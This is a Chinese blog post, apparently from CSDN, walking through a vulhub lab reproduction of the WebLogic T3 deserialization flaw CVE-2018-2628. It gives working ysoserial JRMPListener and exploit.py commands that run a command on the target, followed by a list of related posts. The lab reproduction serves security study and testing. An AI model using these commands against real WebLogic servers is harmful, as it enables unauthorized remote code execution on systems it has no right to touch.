vulhub中Weblogic WLS Core Components 反序列化命令执行漏洞复现(CVE-2018-2628)

最新推荐文章于 2024-11-09 22:18:56 发布
最新推荐文章于 2024-11-09 22:18:56 发布
阅读量291 收藏
点赞数 2
分类专栏: vulhub漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yougexiaojiuguan/article/details/136593120
版权

Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。

访问http://your-ip:7001/console,初始化整个环境。

漏洞复现

首先下载ysoserial,并启动一个JRMP Server:




java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

java -cp ysoserial-all.jar  ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'touch /tmp/success'


其中,`[command]`即为我想执行的命令,而`[listen port]`是JRMP Server监听的端口。

然后,使用[exploit.py](https://www.exploit-db.com/exploits/44553)脚本,向目标Weblogic(`http://your-ip:7001`)发送数据包:


python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

python2 exp.py 192.168.188.139 7001 /home/kali/Desktop/ysoserial-all.jar  192.168.188.139 1099 JRMPClient

其中,`[victim ip]`和`[victim port]`是目标weblogic的IP和端口,`[path to ysoserial]`是本地ysoserial的路径,`[JRMPListener ip]`和`[JRMPListener port]`第一步中启动JRMP Server的IP地址和端口。`[JRMPClient]`是执行JRMPClient的类,可选的值是`JRMPClient`或`JRMPClient2`。

exploit.py执行完成后,执行docker compose exec weblogic bash进入容器中,可见/tmp/success已成功创建。

余生有个小酒馆
关注
专栏目录
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
rumil的博客
09-19 9729
WebLogic 存在远程代码执行漏洞CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
Weblogic CVE-2018-2628 T3协议反序列化命令执行漏洞
读书 买花 长大
02-19 1016
CVE-2018-2628
Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628
weixin_45653478的博客
05-13 1329
CVE-2018-2628 是 Oracle WebLogic Server(WLS)核心组件的一个反序列化命令执行漏洞。此漏洞允许未授权的用户通过 T3 协议在远程服务器上执行任意命令,从而可能完全控制受影响的服务器。
Vulhub漏洞系列:Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628
weixin_43072923的博客
10-16 3586
xxx:xxx00.前言01.简介02.漏洞描述03.漏洞复现 00.前言 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.简介   Oracle 2018年4月补丁,修复了Weblogic Server WLS Core Components出现的一个反序列化漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 参考链接: http://www.oracle.com/technetw
Weblogic WLS Core Components 反序列化命令执行漏洞复现CVE-2018-2628
yang1234567898的博客
04-21 535
Oracle 2018年4月补丁,修复了Weblogic Server WLS Core Components出现的一个反序列化漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令漏洞产生原因: 攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议
Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628复现
s1056481432的博客
08-02 855
漏洞介绍 Oracle 2018年4月补丁,修复了Weblogic Server WLS Core Components出现的一个反序列化漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令漏洞环境 我这里是直接用vulhub搭建环境的官网:https://vulhub.org/,使用方法很简单直接git clone https://github.com/vulhub/vulhub.git 就可以了,之后到下载的文件夹找到我们要复现漏洞的文件夹
Weblogic WLS Core Components 反序列化命令执行漏洞 CVE-2018-2628 漏洞复现
ADummy的博客
03-01 326
Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628) by ADummy 0x00利用路线 ​ 启动一个JRMP Server—>执行exp文件—>命令执行 0x01漏洞介绍 ​ 在 WebLogic 里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻
vulhubWeblogic WLS Core Components 反序列化命令执行漏洞CVE-2018-2628
qq_45300786的博客
08-27 320
简单来说就是先用序列化工具ysoserial启动一个JRMP服务,加载先相关漏洞利用链,加载你要执行的恶意代码。并将上述结果通过序列化工具ysoserial将我们的恶意代码进行一个序列化操作。第二步就是将我们的exp去加载ysoserial序列化后的数据,后去打有漏洞的服务。这个有反序列化漏洞的服务,会去反序列化后,执行我们的恶意代码。
WLS Core Components反序列化命令执行漏洞CVE-2018-2628
wcl20010的博客
05-24 626
目录 原理 影响版本: 常规利用方式: 信息收集 漏洞检测方法 攻击操作 另一种方式 exp利用方式 原理 远程攻击者可利用该漏洞在未授权的情况下发送攻击数据,通过T3协议(EJB支持远程访问,且支持多种协议。这是Web Container和EJB Container的主要区别)在Weblogic Server执行反序列化操作,利用RMI(远程方法调用) 机制的缺陷,通过 JRMP 协议(Java Remote Messaging Protocol:java远程消息交换协议)达到执行
Weblogic反序列化命令执行漏洞CVE-2018-2628复现
热门推荐
君莫hacker的博客
09-11 1万+
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现0x04 漏洞修复 0x01 漏洞介绍 漏洞描述 Weblogic Server WLS Core Components反序列化命令执行漏洞CVE-2018-2628),该漏洞通过T3协议触发,可导致未授权的用户在远程服务器执行任意命令 漏洞编号 CVE-2018-2628 受影响版本 Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2 Weblogic 12.2.1.3 0
weblogic10.36 CVE-2018-2893补丁文件
08-02
WebLogicCVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。...
CVE-2018-2628Weblogic WLS Core Components 反序列化命令执行漏洞
weixin_45253622的博客
12-12 1808
漏洞简介 Oracle 2018年4月补丁,修复了Weblogic Server WLS Core Components出现的一个反序列化漏洞CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令漏洞原理 远程攻击者可利用该漏洞在未授权的情况下发送攻击数据,通过T3协议(EJB支持远程访问,且支持多种协议。这是Web Container和EJB Container的主要区别)在Weblogic Server执行反序列化操作,利用RMI(远程方法调用) 机
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
11-06 1687
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)的2到3个,都可以较好的胜任工作需求。
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
11-05 1172
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)的2到3个,都可以较好的胜任工作需求。
硬件设备网络安全问题与潜在漏洞分析及渗透测试应用
weixin_62512865的博客
11-08 1068
硬件加密绕过漏洞:研究发现,多款流行的SSD存在加密机制绕过漏洞,攻击者可以无需密码 即可绕过硬盘加密措施,获取硬盘的数据内容。这包括Crucial和Samsung等品牌的SSD产 品,它们尝试实现TCG Opal加密标准,但存在缺陷,允许在不知道任何密钥的情况下完全恢 复数据。固件更新机制漏洞:英睿达MX500系列SSD被曝出存在缓冲区溢出漏洞,攻击者可以精心构 造ATA数据包,通过主机直接发送给SSD控制器,从而触发缓冲区溢出,可能导致数据泄露。
入门网络安全工程师要学习哪些内容(详细教程)
白帽子佳奇的博客
11-06 616
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、间件、数据库。其电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
11-05 545
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全:数字时代的防护盾
勇敢的人先享受世界
11-06 604
网络安全(Cybersecurity)是指采取一系列措施来保护网络及其传输的数据免受未经授权的访问、篡改、攻击和损坏。机密性(Confidentiality):确保信息只能被授权的人或系统访问,防止数据泄露。完整性(Integrity):确保数据在传输和存储过程不被篡改,保证数据的准确性和可靠性。可用性(Availability):确保数据和网络服务对合法用户的可用性,不受阻止或断。网络安全不仅仅是防止黑客攻击,还包括防止各种类型的网络威胁、确保系统可靠性、实施安全政策和技术等多方面内容。
网络安全之信息收集
最新发布
qq_63034068的博客
11-09 365
网站漏洞扫描,各种扫描器了 如AWVS,Xray,Goby以及各种工具一起利用。Google 语法:intitle=公司名称;nslookup 如果返回域名解析对应多个 IP 地址多半是使用了 CDN。百度 语法:intitle=公司名称;目录扫描 御剑 dirsearch。
验证WebLogic CVE-2018-2628漏洞的POC工具使用
- CVE-2018-2628是一个远程代码执行漏洞,攻击者可以未经认证远程执行代码。 - 通过PoC脚本验证漏洞WebLogic服务器特定端点的响应能帮助识别漏洞存在。 - PoC脚本通常用Python编写,如提供的`weblogic_poc.cve-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值